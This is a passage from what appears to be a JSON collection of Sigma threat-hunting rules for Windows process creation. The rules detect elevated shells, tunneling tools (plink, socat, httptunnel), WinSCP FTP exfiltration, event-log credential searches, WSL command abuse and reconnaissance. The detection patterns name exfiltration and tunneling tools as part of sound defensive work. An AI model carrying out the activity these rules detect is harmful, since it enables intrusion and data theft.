    "content": "title: Elevated System Shell Spawned\nid: 61065c72-5d7d-44ef-bf41-6a36684b545f\nrelated:\n    - id: 178e615d-e666-498b-9630-9ed363038101\n      type: similar\nstatus: test\ndescription: |\n    Detects when a shell program such as the Windows command prompt or PowerShell is launched with system privileges. Use this rule to hunt for potential suspicious processes.\nreferences:\n    - https://github.com/Wh04m1001/SysmonEoP\nauthor: Nasreddine Bencherchali (Nextron Systems), frack113\ndate: 2023-11-23\nmodified: 2025-03-06\ntags:\n    - attack.privilege-escalation\n    - attack.defense-evasion\n    - attack.execution\n    - attack.t1059\n    - detection.threat-hunting\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_shell:\n        - Image|endswith:\n              - '\\powershell.exe'\n              - '\\powershell_ise.exe'\n              - '\\pwsh.exe'\n              - '\\cmd.exe'\n        - OriginalFileName:\n              - 'PowerShell.EXE'\n              - 'powershell_ise.EXE'\n              - 'pwsh.dll'\n              - 'Cmd.Exe'\n    selection_user:\n        User|contains: # covers many language settings\n            - 'AUTHORI'\n            - 'AUTORI'\n        LogonId: '0x3e7'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules-threat-hunting/windows/process_creation/proc_creation_win_susp_event_log_query.yml",
    "content": "title: EventLog Query Requests By Builtin Utilities\nid: 9cd55b6c-430a-4fa9-96f4-7cadf5229e9f\nrelated:\n    - id: beaa66d6-aa1b-4e3c-80f5-e0145369bfaf\n      type: derived\nstatus: test\ndescription: |\n    Detect attempts to query the contents of the event log using command line utilities. Attackers use this technique in order to look for sensitive information in the logs such as passwords, usernames, IPs, etc.\nreferences:\n    - https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.diagnostics/get-winevent?view=powershell-7.3\n    - https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-eventlog?view=powershell-5.1\n    - http://www.solomonson.com/posts/2010-07-09-reading-eventviewer-command-line/\n    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wevtutil\nauthor: Ali Alwashali, Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-11-20\nmodified: 2024-01-24\ntags:\n    - attack.t1552\n    - attack.credential-access\n    - detection.threat-hunting\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_wmi:\n        CommandLine|contains|all:\n            - 'Select'\n            - 'Win32_NTLogEvent'\n    selection_wevtutil_img:\n        - Image|endswith: '\\wevtutil.exe'\n        - OriginalFileName: 'wevtutil.exe'\n    selection_wevtutil_cli:\n        CommandLine|contains:\n            - ' qe '\n            - ' query-events '\n    selection_wmic_img:\n        - Image|endswith: '\\wmic.exe'\n        - OriginalFileName: 'wmic.exe'\n    selection_wmic_cli:\n        CommandLine|contains: ' ntevent'\n    selection_cmdlet:\n        CommandLine|contains:\n            - 'Get-WinEvent '\n            - 'get-eventlog '\n    condition: selection_wmi or all of selection_wevtutil_* or all of selection_wmic_* or selection_cmdlet\nfalsepositives:\n    - Legitimate log access by administrators or troubleshooting tools\nlevel: medium\n"
  },
  {
    "path": "rules-threat-hunting/windows/process_creation/proc_creation_win_susp_execution_from_guid_folder_names.yml",
    "content": "title: Potential Suspicious Execution From GUID Like Folder Names\nid: 90b63c33-2b97-4631-a011-ceb0f47b77c3\nstatus: test\ndescription: |\n    Detects potential suspicious execution of a GUID like folder name located in a suspicious location such as %TEMP% as seen being used in IcedID attacks.\n    Use this rule to hunt for potentially suspicious activity stemming from uncommon folders.\nreferences:\n    - https://twitter.com/Kostastsale/status/1565257924204986369\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-09-01\nmodified: 2023-03-02\ntags:\n    - attack.defense-evasion\n    - attack.t1027\n    - detection.threat-hunting\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    # Uncomment this section and remove the filter if you want the rule to be more specific to processes\n    # selection_img:\n    #     Image|endswith:\n    #         - '\\rundll32.exe'\n    selection_folder:\n        CommandLine|contains:\n            # Add more suspicious or unexpected paths\n            - '\\AppData\\Roaming\\'\n            - '\\AppData\\Local\\Temp\\' # This could generate some FP with some installers creating folders with GUID\n    selection_guid:\n        CommandLine|contains|all:\n            - '\\{'\n            - '}\\'\n    filter_main_image_guid:\n        Image|contains|all:\n            - '\\{'\n            - '}\\'\n    filter_main_null:\n        Image: null\n    filter_main_driver_inst:  # DrvInst.exe \"4\" \"0\" \"C:\\Users\\venom\\AppData\\Local\\Temp\\{a0753cc2-fcea-4d49-a787-2290b564b06f}\\nvvhci.inf\" \"9\" \"43a2fa8e7\" \"00000000000001C0\" \"WinSta0\\Default\" \"00000000000001C4\" \"208\" \"c:\\program files\\nvidia corporation\\installer2\\nvvhci.{eb7b4460-7ec9-42d6-b73f-d487d4550526}\"\n        Image: 'C:\\Windows\\System32\\drvinst.exe'\n    filter_main_msiexec:\n        Image:\n            - 'C:\\Windows\\System32\\msiexec.exe'\n            - 'C:\\Windows\\SysWOW64\\msiexec.exe'\n    condition: all of selection_* and not 1 of filter*\nfalsepositives:\n    - Installers are sometimes known for creating temporary folders with GUID like names. Add appropriate filters accordingly\nlevel: low\n"
  },
  {
    "path": "rules-threat-hunting/windows/process_creation/proc_creation_win_susp_execution_path_webserver.yml",
    "content": "title: Execution From Webserver Root Folder\nid: 35efb964-e6a5-47ad-bbcd-19661854018d\nstatus: test\ndescription: |\n    Detects a program executing from a web server root folder. Use this rule to hunt for potential interesting activity such as webshell or backdoors\nreferences:\n    - Internal Research\nauthor: Florian Roth (Nextron Systems)\ndate: 2019-01-16\nmodified: 2024-01-18\ntags:\n    - attack.persistence\n    - attack.t1505.003\n    - detection.threat-hunting\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|contains:\n            - '\\wwwroot\\'\n            - '\\wmpub\\'\n            - '\\htdocs\\'\n    filter_main_generic:\n        Image|contains:\n            - 'bin\\'\n            - '\\Tools\\'\n            - '\\SMSComponent\\'\n        ParentImage|endswith: '\\services.exe'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Various applications\n    - Tools that include ping or nslookup command invocations\nlevel: medium\n"
  },
  {
    "path": "rules-threat-hunting/windows/process_creation/proc_creation_win_susp_exfil_and_tunneling_tool_execution.yml",
    "content": "title: Tunneling Tool Execution\nid: c75309a3-59f8-4a8d-9c2c-4c927ad50555\nstatus: test\ndescription: Detects the execution of well known tools that can be abused for data exfiltration and tunneling.\nauthor: Daniil Yugoslavskiy, oscd.community\nreferences:\n    - https://www.microsoft.com/en-us/security/blog/2022/07/26/malicious-iis-extensions-quietly-open-persistent-backdoors-into-servers/\ndate: 2019-10-24\nmodified: 2024-01-18\ntags:\n    - attack.exfiltration\n    - attack.command-and-control\n    - attack.t1041\n    - attack.t1572\n    - attack.t1071.001\n    - detection.threat-hunting\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith:\n            - '\\httptunnel.exe'\n            - '\\plink.exe'\n            - '\\socat.exe'\n            - '\\stunnel.exe'\n    condition: selection\nfalsepositives:\n    - Legitimate administrators using one of these tools\nlevel: medium\n"
  },
  {
    "path": "rules-threat-hunting/windows/process_creation/proc_creation_win_susp_file_permission_modifications.yml",
    "content": "title: File or Folder Permissions Modifications\nid: 37ae075c-271b-459b-8d7b-55ad5f993dd8\nstatus: test\ndescription: Detects a file or folder's permissions being modified or tampered with.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1222.001/T1222.001.md\n    - https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/hh750728(v=ws.11)\n    - https://github.com/swagkarna/Defeat-Defender-V1.2.0/tree/ae4059c4276da6f6303b8f53cdff085ecae88a91\nauthor: Jakob Weinzettl, oscd.community, Nasreddine Bencherchali (Nextron Systems)\ndate: 2019-10-23\nmodified: 2023-11-21\ntags:\n    - attack.defense-evasion\n    - attack.t1222.001\n    - detection.threat-hunting\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_1:\n        Image|endswith:\n            - '\\cacls.exe'\n            - '\\icacls.exe'\n            - '\\net.exe' # \"grant\" Option available when used with \"net share\"\n            - '\\net1.exe' # \"grant\" Option available when used with \"net share\"\n        CommandLine|contains:\n            - '/grant'\n            - '/setowner'\n            - '/inheritance:r' # Remove all inherited ACEs\n    selection_2:\n        Image|endswith: '\\attrib.exe'\n        CommandLine|contains: '-r'\n    selection_3:\n        Image|endswith: '\\takeown.exe' # If this generates FP in your environment. Comment it out or add more suspicious flags and locations\n    filter_optional_dynatrace_1:\n        CommandLine|endswith: 'ICACLS C:\\ProgramData\\dynatrace\\gateway\\config\\connectivity.history /reset'\n    filter_optional_dynatrace_2:\n        CommandLine|contains|all:\n            - 'ICACLS C:\\ProgramData\\dynatrace\\gateway\\config\\config.properties /grant :r '\n            - 'S-1-5-19:F'\n    filter_optional_vscode:\n        CommandLine|contains:\n            - '\\AppData\\Local\\Programs\\Microsoft VS Code'\n            - ':\\Program Files\\Microsoft VS Code'\n    filter_optional_avira:\n        CommandLine|contains:\n            - ':\\Program Files (x86)\\Avira'\n            - ':\\Program Files\\Avira'\n    condition: 1 of selection_* and not 1 of filter_optional_*\nfalsepositives:\n    - Users interacting with the files on their own (unlikely unless privileged users).\n    - Dynatrace app\nlevel: medium\n"
  },
  {
    "path": "rules-threat-hunting/windows/process_creation/proc_creation_win_susp_ntfs_short_name_path_use_cli.yml",
    "content": "title: Use Short Name Path in Command Line\nid: 349d891d-fef0-4fe4-bc53-eee623a15969\nrelated:\n    - id: a96970af-f126-420d-90e1-d37bf25e50e1\n      type: similar\nstatus: test\ndescription: |\n    Detects the use of short name paths (8.3 format) in command lines, which can be used to obfuscate paths or access restricted locations.\n    Windows creates short 8.3 filenames (like PROGRA~1) for compatibility with MS-DOS-based or 16-bit Windows programs.\n    When investigating, examine:\n    - Commands using short paths to access sensitive directories or files\n    - Web servers on Windows (especially Apache) where short filenames could bypass security controls\n    - Correlation with other suspicious behaviors\n    - baseline of short name usage in your environment and look for deviations\nreferences:\n    - https://www.acunetix.com/blog/articles/windows-short-8-3-filenames-web-security-problem/\n    - https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)\n    - https://twitter.com/frack113/status/1555830623633375232\nauthor: frack113, Nasreddine Bencherchali\ndate: 2022-08-07\nmodified: 2025-10-22\ntags:\n    - attack.defense-evasion\n    - attack.t1564.004\n    - detection.threat-hunting\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains:\n            - '~1\\'\n            - '~2\\'\n    filter_main_system_process:\n        ParentImage:\n            - 'C:\\Windows\\System32\\Dism.exe'\n            - 'C:\\Windows\\System32\\cleanmgr.exe'\n    filter_main_winget:\n        - ParentImage|endswith: '\\winget.exe'\n        - ParentImage|contains: '\\AppData\\Local\\Temp\\WinGet\\'\n    filter_main_csc:\n        ParentImage|startswith: 'C:\\Windows\\Microsoft.NET\\Framework64\\v'\n        ParentImage|endswith: '\\csc.exe'\n    filter_main_installers:\n        - Image|contains|all:\n              - '\\AppData\\'\n              - '\\Temp\\'\n        - CommandLine|contains: '\\AppData\\Local\\Temp\\' # sometimes installers spawn other installers from temp folder\n    filter_optional_dopus:\n        ParentImage: 'C:\\Program Files\\GPSoftware\\Directory Opus\\dopus.exe'\n    filter_optional_aurora:\n        ParentImage|endswith:\n            - '\\aurora-agent-64.exe'\n            - '\\aurora-agent.exe'\n    filter_optional_thor:\n        ParentImage|endswith: '\\thor\\thor64.exe'\n    filter_optional_git:\n        CommandLine|contains:\n            - 'C:\\Program Files\\Git\\post-install.bat'\n            - 'C:\\Program Files\\Git\\cmd\\scalar.exe'\n    filter_optional_webex:\n        - ParentImage|endswith: '\\WebEx\\webexhost.exe'\n        - CommandLine|contains: '\\appdata\\local\\webex\\webex64\\meetings\\wbxreport.exe'\n    filter_optional_veeam:\n        ParentImage|endswith: '\\veeam.backup.shell.exe'\n    filter_optional_everything:\n        ParentImage|endswith: '\\Everything\\Everything.exe'\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Applications could use this notation occasionally which might generate some false positives. In that case investigate the parent and child process.\nlevel: medium\n"
  },
  {
    "path": "rules-threat-hunting/windows/process_creation/proc_creation_win_susp_open_html_file_from_download_folder.yml",
    "content": "title: HTML File Opened From Download Folder\nid: 538c5851-8c03-4724-8ec4-623bc7aadaea\nstatus: experimental\ndescription: |\n    Detects web browser process opening an HTML file from a user's Downloads folder.\n    This behavior is could be associated with phishing attacks where threat actors send HTML attachments to users.\n    When a user opens such an attachment, it can lead to the execution of malicious scripts or the download of malware.\n    During investigation, analyze the HTML file for embedded scripts or links, check for any subsequent downloads or process executions, and investigate the source of the email or message containing the attachment.\nreferences:\n    - https://app.any.run/tasks/ae3c4ded-fd6a-43ed-8215-ba0ba574ad33\n    - https://app.any.run/tasks/8901e2d5-0c5a-48ba-a8e9-10b5ed7e06f4\nauthor: Joseph Kamau\ndate: 2025-12-05\ntags:\n    - attack.t1598.002\n    - attack.t1566.001\n    - attack.initial-access\n    - attack.reconnaissance\n    - detection.threat-hunting\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection:\n        Image|endswith:\n            - '\\brave.exe'\n            - '\\chrome.exe'\n            - '\\firefox.exe'\n            - '\\msedge.exe'\n            - '\\opera.exe'\n            - '\\vivaldi.exe'\n        CommandLine|contains|all:\n            - ':\\users\\'\n            - '\\Downloads\\'\n            - '.htm'\n    condition: selection\nfalsepositives:\n    - Opening any HTML file located in users directories via a browser process will trigger this.\nlevel: low\n"
  },
  {
    "path": "rules-threat-hunting/windows/process_creation/proc_creation_win_susp_parent_execute_itself.yml",
    "content": "title: Potential Executable Run Itself As Sacrificial Process\nid: bafd07c6-3ea5-454a-b4be-058fbb073de7\nstatus: experimental\ndescription: |\n    Detects when an executable launches an identical instance of itself, a behavior often used to create a suspended “sacrificial” process for code injection or evasion.\n    Investigate for indicators such as the process being started in suspended mode, rapid parent termination, memory manipulation (e.g., WriteProcessMemory, CreateRemoteThread), or unsigned binaries.\n    Review command-line arguments, process ancestry, and network activity to confirm if this is legitimate behavior or process injection activity.\nreferences:\n    - https://www.joesandbox.com/analysis/1605063/0/html\nauthor: frack113\ndate: 2025-10-17\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1055\n    - detection.threat-hunting\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|fieldref: ParentImage\n    filter_main_path:\n        Image|startswith:\n            - 'C:\\Program Files\\'\n            - 'C:\\Program Files (x86)\\'\n    filter_main_original_fn:\n        OriginalFileName:\n            - 'Cmd.Exe'\n            - 'CompatTelRunner.exe'\n            - 'Discord.exe'\n            - 'electron.exe' # Vs Code\n            - 'EXPLORER.EXE'\n            - 'httpd.exe'\n            - 'IE4UINIT.EXE'\n            - 'mmc.exe'\n            - 'MpCmdRun.exe'\n            - 'mscorsvw.exe'\n            - 'msiexec.exe'\n            - 'NGenTask.exe'\n            - 'OneDriveSetup.exe'\n            - 'PowerShell.EXE'\n            - 'REGSVR32.EXE'\n            - 'smss.exe'\n            - 'Spotify.exe'\n            - 'WerMgr'\n    filter_main_product:\n        Product:\n            - 'Avira'\n            - 'Evernote'\n            - 'Firefox'\n            - 'Microsoft Office'\n            - 'Ninite'\n            - 'Opera Browser Assistant Installer'\n            - 'Opera Installer'\n            - 'Sysinternals Sysmon'\n    condition: selection and not 1 of filter_*\nfalsepositives:\n    - Legitimate software that may launch a new instance of itself, especially updaters or installers. Investigate each alert and apply whitelisting as needed.\n# Increase the level after some initial tuning in your environment\nlevel: low\n"
  },
  {
    "path": "rules-threat-hunting/windows/process_creation/proc_creation_win_susp_script_exec_from_compressed_parent.yml",
    "content": "title: Manual Execution of Script Inside of a Compressed File\nid: 95724fc1-a258-4674-97db-a30351981c5a\nstatus: test\ndescription: |\n    This is a threat-hunting query to collect information related to the interactive execution of a script from inside a compressed file (zip/rar). Windows will automatically run the script using scripting interpreters such as wscript and cscript binaries.\n\n    From the query below, the child process is the script interpreter that will execute the script. The script extension is also a set of standard extensions that Windows OS recognizes. Selections 1-3 contain three different execution scenarios.\n        1. Compressed file opened using 7zip.\n        2. Compressed file opened using WinRar.\n        3. Compressed file opened using native windows File Explorer capabilities.\n\n    When the malicious script is double-clicked, it will be extracted to the respected directories as signified by the CommandLine on each of the three Selections. It will then be executed using the relevant script interpreter.\"\nreferences:\n    - https://app.any.run/tasks/25970bb5-f864-4e9e-9e1b-cc8ff9e6386a\n    - https://app.any.run/tasks/fa99cedc-9d2f-4115-a08e-291429ce3692\nauthor: '@kostastsale'\ndate: 2023-02-15\nmodified: 2024-08-13\ntags:\n    - attack.execution\n    - attack.t1059\n    - detection.threat-hunting\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_parent_7zip:\n        ParentImage|endswith: '\\7z*.exe'\n        CommandLine|contains: '\\AppData\\local\\temp\\7z*\\'\n    selection_parent_winrar:\n        ParentImage|endswith: '\\winrar.exe'\n        CommandLine|contains: '\\AppData\\local\\temp\\rar*\\'\n    selection_parent_explorer:\n        ParentImage|endswith: '\\explorer.exe'\n        CommandLine|contains:\n            - '\\AppData\\local\\temp\\*.rar\\'\n            - '\\AppData\\local\\temp\\*.zip\\'\n    selection_child:\n        Image|endswith:\n            - '\\cscript.exe'\n            - '\\mshta.exe'\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n            - '\\wscript.exe'\n        CommandLine|endswith:\n            - '.hta'\n            - '.js'\n            - '.jse'\n            - '.ps1'\n            - '.vbe'\n            - '.vbs'\n            - '.wsf'\n            - '.wsh'\n    condition: 1 of selection_parent_* and selection_child\nfalsepositives:\n    - Batch files may produce a lot of noise, as many applications appear to bundle them as part of their installation process. You should baseline your environment and generate a new query excluding the noisy and expected activity. Some false positives may come up depending on your environment. All results should be investigated thoroughly before filtering out results.\nlevel: medium\n"
  },
  {
    "path": "rules-threat-hunting/windows/process_creation/proc_creation_win_taskkill_execution.yml",
    "content": "title: Process Terminated Via Taskkill\nid: 86085955-ea48-42a2-9dd3-85d4c36b167d\nstatus: test\ndescription: |\n    Detects execution of \"taskkill.exe\" in order to stop a service or a process. Look for suspicious parents executing this command in order to hunt for potential malicious activity.\n    Attackers might leverage this in order to conduct data destruction or data encrypted for impact on the data stores of services like Exchange and SQL Server.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1489/T1489.md#atomic-test-3---windows---stop-service-by-killing-process\n    - https://unit42.paloaltonetworks.com/snipbot-romcom-malware-variant/\nauthor: frack113, MalGamy (Nextron Systems), Nasreddine Bencherchali\ndate: 2021-12-26\nmodified: 2024-10-06\ntags:\n    - attack.impact\n    - attack.t1489\n    - detection.threat-hunting\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\taskkill.exe'\n        - OriginalFileName: 'taskkill.exe'\n    selection_cli_force:\n        - CommandLine|contains|windash: ' /f '\n        - CommandLine|endswith|windash: ' /f'\n    selection_cli_filter_process:\n        CommandLine|contains|windash:\n            - ' /im '\n            - ' /pid '\n    filter_main_installers:\n        ParentImage|contains:\n            - '\\AppData\\Local\\Temp\\'\n            - ':\\Windows\\Temp'\n        ParentImage|endswith: '.tmp'\n    condition: all of selection_* and not 1 of filter_main_*\nfalsepositives:\n    - Expected FP with some processes using this techniques to terminate one of their processes during installations and updates\nlevel: low\n"
  },
  {
    "path": "rules-threat-hunting/windows/process_creation/proc_creation_win_tasklist_basic_execution.yml",
    "content": "title: Suspicious Tasklist Discovery Command\nid: 63332011-f057-496c-ad8d-d2b6afb27f96\nstatus: test\ndescription: Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1057/T1057.md#atomic-test-2---process-discovery---tasklist\nauthor: frack113\ndate: 2021-12-11\nmodified: 2022-12-25\ntags:\n    - attack.discovery\n    - attack.t1057\n    - detection.threat-hunting\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - CommandLine|contains: 'tasklist'\n        - Image|endswith: '\\tasklist.exe'\n        - OriginalFileName: 'tasklist.exe'\n    condition: selection\nfalsepositives:\n    - Likely from users, administrator and different internal and third party applications.\nlevel: informational\n"
  },
  {
    "path": "rules-threat-hunting/windows/process_creation/proc_creation_win_webdav_process_execution.yml",
    "content": "title: Process Execution From WebDAV Share\nid: f8de9dd5-7a63-4cfd-9d0c-ae124878b5a9\nstatus: experimental\ndescription: |\n    Detects execution of processes with image paths starting with WebDAV shares (\\\\), which might indicate malicious file execution from remote web shares.\n    Execution of processes from WebDAV shares can be a sign of lateral movement or exploitation attempts, especially if the process is not a known legitimate application.\n    Exploitation Attempt of vulnerabilities like CVE-2025-33053 also involves executing processes from WebDAV paths.\nreferences:\n    - https://research.checkpoint.com/2025/stealth-falcon-zero-day/\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-06-13\ntags:\n    - attack.execution\n    - attack.command-and-control\n    - attack.lateral-movement\n    - attack.t1105\n    - detection.threat-hunting\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|startswith: '\\\\\\\\'\n        Image|contains: '\\DavWWWRoot\\'\n    condition: selection\nfalsepositives:\n    - Legitimate use of WebDAV shares for process execution\n    - Known applications executing from WebDAV paths\nlevel: low\n"
  },
  {
    "path": "rules-threat-hunting/windows/process_creation/proc_creation_win_winscp_command_open_ftp.yml",
    "content": "title: FTP Connection Open Attempt Via Winscp CLI\nid: c1477deb-37cf-4439-9ffb-44499acb89d0\nstatus: experimental\ndescription: Detects the execution of Winscp with the \"-command\" and the \"open\" flags in order to open an FTP connection. Akira ransomware was seen using this technique in order to exfiltrate data.\nreferences:\n    - https://blogs.blackberry.com/en/2024/07/akira-ransomware-targets-the-latam-airline-industry\nauthor: frack113\ndate: 2025-10-12\ntags:\n    - attack.exfiltration\n    - attack.t1048\n    - detection.threat-hunting\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\WinSCP.exe'\n        - OriginalFileName: 'winscp.exe'\n    selection_cmd:\n        CommandLine|contains|windash: '-command'\n        CommandLine|contains|all:\n            - 'open '\n            - 'ftp://' # cover ftp and sftp\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules-threat-hunting/windows/process_creation/proc_creation_win_winscp_portable_execution.yml",
    "content": "title: Winscp Execution From Non Standard Folder\nid: 7674f8ef-7141-4cf0-a311-ee359264c64c\nstatus: experimental\ndescription: Detects the execution of Winscp from an a non standard folder. This could indicate the execution of Winscp portable.\nreferences:\n    - https://blogs.blackberry.com/en/2024/07/akira-ransomware-targets-the-latam-airline-industry\nauthor: frack113\ndate: 2025-10-12\ntags:\n    - attack.exfiltration\n    - attack.t1048\n    - detection.threat-hunting\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - Image|endswith: '\\WinSCP.exe'\n        - OriginalFileName: 'winscp.exe'\n    filter_main_location:\n        Image|startswith: 'C:\\Program Files (x86)\\WinSCP\\'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules-threat-hunting/windows/process_creation/proc_creation_win_wmic_recon_system_info.yml",
    "content": "title: System Information Discovery Via Wmic.EXE\nid: d85ecdd7-b855-4e6e-af59-d9c78b5b861e\nrelated:\n    - id: 9d5a1274-922a-49d0-87f3-8c653483b909\n      type: derived\nstatus: test\ndescription: |\n    Detects the use of the WMI command-line (WMIC) utility to identify and display various system information,\n    including OS, CPU, GPU, disk drive names, memory capacity, display resolution, baseboard, BIOS,\n    and GPU driver products/versions.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/a2ccd19c37d0278b4ffa8583add3cf52060a5418/atomics/T1082/T1082.md#atomic-test-25---system-information-discovery-with-wmic\n    - https://nwgat.ninja/getting-system-information-with-wmic-on-windows/\n    - https://blog.sekoia.io/aurora-a-rising-stealer-flying-under-the-radar\n    - https://blog.cyble.com/2023/01/18/aurora-a-stealer-using-shapeshifting-tactics/\n    - https://app.any.run/tasks/a6aa0057-82ec-451f-8f99-55650ca537da/\n    - https://www.virustotal.com/gui/file/d6f6bc10ae0e634ed4301d584f61418cee18e5d58ad9af72f8aa552dc4aaeca3/behavior\nauthor: Joseliyo Sanchez, @Joseliyo_Jstnk\ndate: 2023-12-19\nmodified: 2024-01-15\ntags:\n    - attack.discovery\n    - attack.t1082\n    - detection.threat-hunting\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_wmic:\n        - Description: 'WMI Commandline Utility'\n        - OriginalFileName: 'wmic.exe'\n        - Image|endswith: '\\WMIC.exe'\n    selection_get:\n        CommandLine|contains: 'get'\n    selection_classes:\n        CommandLine|contains:\n            - 'baseboard'\n            - 'bios'\n            - 'cpu'\n            - 'diskdrive'\n            - 'logicaldisk'\n            - 'memphysical'\n            - 'os'\n            - 'path'\n            - 'startup'\n            - 'win32_videocontroller'\n    selection_attributes:\n        CommandLine|contains:\n            - 'caption'\n            - 'command'\n            - 'driverversion'\n            - 'maxcapacity'\n            - 'name'\n            - 'osarchitecture'\n            - 'product'\n            - 'size'\n            - 'smbiosbiosversion'\n            - 'version'\n            - 'videomodedescription'\n    filter_optional_vmtools:\n        ParentCommandLine|contains: '\\VMware\\VMware Tools\\serviceDiscovery\\scripts\\'\n    condition: all of selection_* and not 1 of filter_optional_*\nfalsepositives:\n    - VMWare Tools serviceDiscovery scripts\n# Note: Might be upgraded to a medium detection rules after some time\nlevel: low\n"
  },
  {
    "path": "rules-threat-hunting/windows/process_creation/proc_creation_win_wscript_cscript_script_exec.yml",
    "content": "title: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript\nid: 1e33157c-53b1-41ad-bbcc-780b80b58288\nrelated:\n    - id: 23250293-eed5-4c39-b57a-841c8933a57d\n      type: obsolete\n    - id: cea72823-df4d-4567-950c-0b579eaf0846\n      type: derived\nstatus: test\ndescription: Detects script file execution (.js, .jse, .vba, .vbe, .vbs, .wsf) by Wscript/Cscript\nreferences:\n    - https://thedfirreport.com/2023/10/30/netsupport-intrusion-results-in-domain-compromise/\n    - https://redcanary.com/blog/gootloader/\nauthor: Michael Haag\ndate: 2019-01-16\nmodified: 2023-05-15\ntags:\n    - attack.execution\n    - attack.t1059.005\n    - attack.t1059.007\n    - detection.threat-hunting\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - OriginalFileName:\n              - 'wscript.exe'\n              - 'cscript.exe'\n        - Image|endswith:\n              - '\\wscript.exe'\n              - '\\cscript.exe'\n    selection_cli:\n        CommandLine|contains:\n            - '.js'\n            - '.jse'\n            - '.vba'\n            - '.vbe'\n            - '.vbs'\n            - '.wsf'\n    condition: all of selection_*\nfalsepositives:\n    - Some additional tuning is required. It is recommended to add the user profile path in CommandLine if it is getting too noisy.\nlevel: medium\n"
  },
  {
    "path": "rules-threat-hunting/windows/process_creation/proc_creation_win_wsl_arbitrary_command_execution.yml",
    "content": "title: Arbitrary Command Execution Using WSL\nid: dec44ca7-61ad-493c-bfd7-8819c5faa09b\nrelated:\n    - id: 2267fe65-0681-42ad-9a6d-46553d3f3480 # Generic susp child processes rules\n      type: similar\nstatus: test\ndescription: |\n    Detects potential abuse of Windows Subsystem for Linux (WSL) binary as a Living of the Land binary in order to execute arbitrary Linux or Windows commands.\nreferences:\n    - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Wsl/\n    - https://twitter.com/nas_bench/status/1535431474429808642\nauthor: oscd.community, Zach Stanford @svch0st, Nasreddine Bencherchali (Nextron Systems)\ndate: 2020-10-05\nmodified: 2023-04-12\ntags:\n    - attack.execution\n    - attack.defense-evasion\n    - attack.t1218\n    - attack.t1202\n    - detection.threat-hunting\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\wsl.exe'\n        - OriginalFileName: 'wsl.exe'\n    selection_cli:\n        CommandLine|contains:\n            - ' -e '\n            - ' --exec'\n            - ' --system'\n            - ' --shell-type '\n            - ' /mnt/c' # Path to mounted \"C:\\\" partition (Indication of running Windows binaries via WSL)\n            - ' --user root'\n            - ' -u root'\n            - '--debug-shell'\n    filter_main_kill:\n        # This filter is to handle a FP that occurs when a process is spawned from WSL and then closed by the user\n        # Example would be to open VsCode through it's server extension from WSL\n            # GrandparentCommandLine: \"C:\\Users\\XXX\\AppData\\Local\\Programs\\Microsoft VS Code\\Code.exe\" --ms-enable-electron-run-as-node c:\\Users\\XXX\\.vscode\\extensions\\ms-vscode-remote.remote-wsl-0.72.0\\dist\\wslDaemon.js\n            # ParentCommandLine: C:\\WINDOWS\\system32\\cmd.exe /d /s /c \"C:\\WINDOWS\\System32\\wsl.exe -d Ubuntu-20.04 -e kill 1366\"\n            # CommandLine: C:\\WINDOWS\\System32\\wsl.exe -d Ubuntu-20.04 -e kill 1366\n        ParentImage|endswith: '\\cmd.exe'\n        CommandLine|contains|all:\n            - ' -d '\n            - ' -e kill '\n    condition: all of selection_* and not 1 of filter_main_*\nfalsepositives:\n    - Automation and orchestration scripts may use this method to execute scripts etc.\n    - Legitimate use by Windows to kill processes opened via WSL (example VsCode WSL server)\nlevel: medium\n"
  },
  {
    "path": "rules-threat-hunting/windows/process_creation/proc_creation_win_wusa_cab_files_extraction.yml",
